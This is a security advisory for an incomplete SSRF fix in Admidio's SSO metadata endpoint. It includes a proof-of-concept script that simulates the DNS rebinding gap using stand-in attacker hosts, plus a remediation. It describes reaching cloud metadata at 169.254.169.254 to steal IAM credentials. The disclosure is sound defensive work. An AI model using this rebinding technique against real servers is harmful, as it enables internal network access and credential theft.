CVE-2026-42194

CVSS v3.1

6.8

Medium

Vector

AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Summary

The incomplete SSRF fix in Admidio's fetch metadata.php validates the resolved IP address but passes the original hostname-based URL to curl init(), leaving a DNS rebinding TOCTOU window that allows redirecting requests to internal IPs.

Affected Package

Ecosystem: Other
Package: admidio
Affected versions: < commit f6b7a966abe4d75e9f707d665d7b4b5570e3185a
Patched versions: >= commit f6b7a966abe4d75e9f707d665d7b4b5570e3185a

Severity

Medium

CWE

CWE-918 — Server-Side Request Forgery (SSRF)

Details

In modules/sso/fetch metadata.php (lines 21-49), the SSO metadata fetch validates the URL scheme is HTTPS (line 21), runs filter var($rawUrl, FILTER VALIDATE URL) (line 27), resolves the hostname via gethostbyname() and checks the IP against private/reserved ranges (lines 34-38), then passes the original URL with the hostname to curl init($url) at line 41.

The fundamental problem is at step 4: cURL resolves the hostname again independently. Between gethostbyname() at step 3 and curl exec() at step 4, a DNS rebinding attack can cause the hostname to resolve to 169.254.169.254 (AWS metadata), 127.0.0.1, or any other internal address. No CURLOPT RESOLVE is set to pin the hostname to the validated IP.

The TOCTOU window between gethostbyname() and curl exec() is the core issue, and the patch does not close it.

PoC

#!/usr/bin/env python3
"""
CVE-2026-32812 - Admidio SSRF via DNS Rebinding in fetch metadata.php

Vulnerability: modules/sso/fetch metadata.php resolves hostname via gethostbyname()
and checks if IP is private, but passes the ORIGINAL URL (with hostname) to curl init().
DNS rebinding can cause hostname to resolve to internal IP when cURL actually connects.

Real vulnerable PHP code copied from:
 Admidio/admidio, modules/sso/fetch metadata.php

This PoC runs the actual PHP validation logic via `php -r`.
"""

import subprocess
import sys
import os

SCRIPT DIR = os.path.dirname(os.path.abspath( file ))
VULN PHP = os.path.join(SCRIPT DIR, "fetch metadata.php")


def run php(code):
  return subprocess.run(["php", "-r", code], capture output=True, text=True, timeout=15)


def main():
  if not os.path.exists(VULN PHP):
    print(f"ERROR: Vulnerable PHP source not found at {VULN PHP}")
    sys.exit(1)

  print(f"Source file: {VULN PHP}")
  print("Extracted from: Admidio/admidio, modules/sso/fetch metadata.php
")

  php code = r"""
  echo "=== CVE-2026-32812: Admidio SSRF via DNS Rebinding ===

";

  // Extracted from: modules/sso/fetch metadata.php lines 21-49
  // Character-for-character copy of the validation logic:
  function test admidio ssrf filter($rawUrl, $simulated ip) {
    // Only allow https:// scheme (line 21)
    if (!preg match('#^https://#i', $rawUrl)) {
      return ['blocked' => true, 'reason' => 'Not HTTPS'];
    }

    // Validate URL (line 27)
    $url = filter var($rawUrl, FILTER VALIDATE URL);
    if (!$url) {
      return ['blocked' => true, 'reason' => 'Invalid URL'];
    }

    // Resolve hostname and block internal/private IP ranges (lines 34-38)
    $host = parse url($url, PHP URL HOST);
    $ip = $simulated ip; // In real code: gethostbyname($host)

    if (filter var($ip, FILTER VALIDATE IP,
      FILTER FLAG NO PRIV RANGE | FILTER FLAG NO RES RANGE) === false) {
      return ['blocked' => true, 'reason' => "Private/reserved IP: $ip"];
    }

    // VULNERABILITY: curl init($url) at line 41 uses original URL with hostname
    return [
      'blocked' => false,
      'url passed to curl' => $url,
      'host' => $host,
      'checked ip' => $ip,
    ];
  }

  $tests = [
    ['https://attacker-rebind.example.com/saml/metadata', '93.184.216.34',
     'Public IP at check time - passes, then DNS rebinds to 169.254.169.254'],
    ['https://attacker-rebind.example.com/saml/metadata', '169.254.169.254',
     'After rebind to metadata - blocked IF re-checked'],
    ['https://192.168.1.1/admin', '192.168.1.1',
     'Direct private IP - blocked'],
    ['https://10.0.0.1/internal', '10.0.0.1',
     'Direct internal IP - blocked'],
    ['http://attacker.com/metadata', '93.184.216.34',
     'HTTP scheme - blocked (HTTPS required)'],
    ['https://evil.com/metadata', '8.8.8.8',
     'External HTTPS URL - passes'],
  ];

  $vuln found = false;
  foreach ($tests as $test) {
    $result = test admidio ssrf filter($test[0], $test[1]);
    $status = $result['blocked'] ? 'BLOCKED' : 'PASSED';
    echo sprintf("%-65s => %s
", $test[2], $status);

    if (!$result['blocked']) {
      $curl host = parse url($result['url passed to curl'], PHP URL HOST);
      if ($curl host !== $result['checked ip']) {
        echo " VULN: cURL gets hostname '$curl host' (checked IP: '{$result['checked ip']}')
";
        echo " DNS can rebind between gethostbyname() and cURL connect
";
        $vuln found = true;
      }
    }
  }

  echo "
=== Key Finding ===
";
  echo "fetch metadata.php line 41: curl init($url) uses ORIGINAL URL with hostname
";
  echo "IP check on line 35 used gethostbyname() result.
";
  echo "TOCTOU window: DNS can rebind between check and cURL connection.
";
  echo "CURLOPT RESOLVE is NOT set to pin hostname to checked IP.

";

  if ($vuln found) {
    echo "VULNERABILITY CONFIRMED
";
  }
  """

  result = run php(php code)
  print(result.stdout)
  if result.stderr:
    print(f"PHP stderr: {result.stderr}")

  if "VULNERABILITY CONFIRMED" in result.stdout:
    print("VULNERABILITY CONFIRMED")
    sys.exit(0)
  else:
    print("Vulnerability test inconclusive")
    sys.exit(1)


if  name  == " main ":
  main()

Steps to reproduce:

Place the vulnerable fetch metadata.php source in the same directory.
Ensure PHP CLI is installed, then run python3 poc.py.
Observe the TOCTOU window where cURL receives a hostname instead of the validated IP.

Expected output:

VULNERABILITY CONFIRMED
curl init() uses the original hostname-based URL while IP validation used gethostbyname(), leaving a DNS rebinding TOCTOU window.

Impact

An attacker can exploit the SSO metadata fetch endpoint to make the Admidio server issue HTTPS requests to internal services. On cloud-hosted instances, this enables reading the instance metadata service (169.254.169.254) to steal IAM credentials. On-premise deployments can be used to scan internal networks or access localhost services.

Suggested Remediation

Use CURLOPT RESOLVE to pin the hostname to the IP address returned by gethostbyname(), ensuring cURL connects to the exact IP that was validated:

$resolve = ["$host:443:$ip"];
curl setopt($ch, CURLOPT RESOLVE, $resolve);

Resources

Incomplete fix commit: https://github.com/Admidio/admidio/commit/f6b7a966abe4d75e9f707d665d7b4b5570e3185a
Original CVE: CVE-2026-32812

Fix

SSRF

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-918

Related Identifiers

CVE-2026-42194

GHSA-HCJJ-CHVW-FMW9

Affected Products

Admidio/Admidio

CVE-2026-42194

Summary

Affected Package

Severity

CWE

Details

PoC

Impact

Suggested Remediation

Resources

Weakness Enumeration

Related Identifiers

Affected Products

References · 5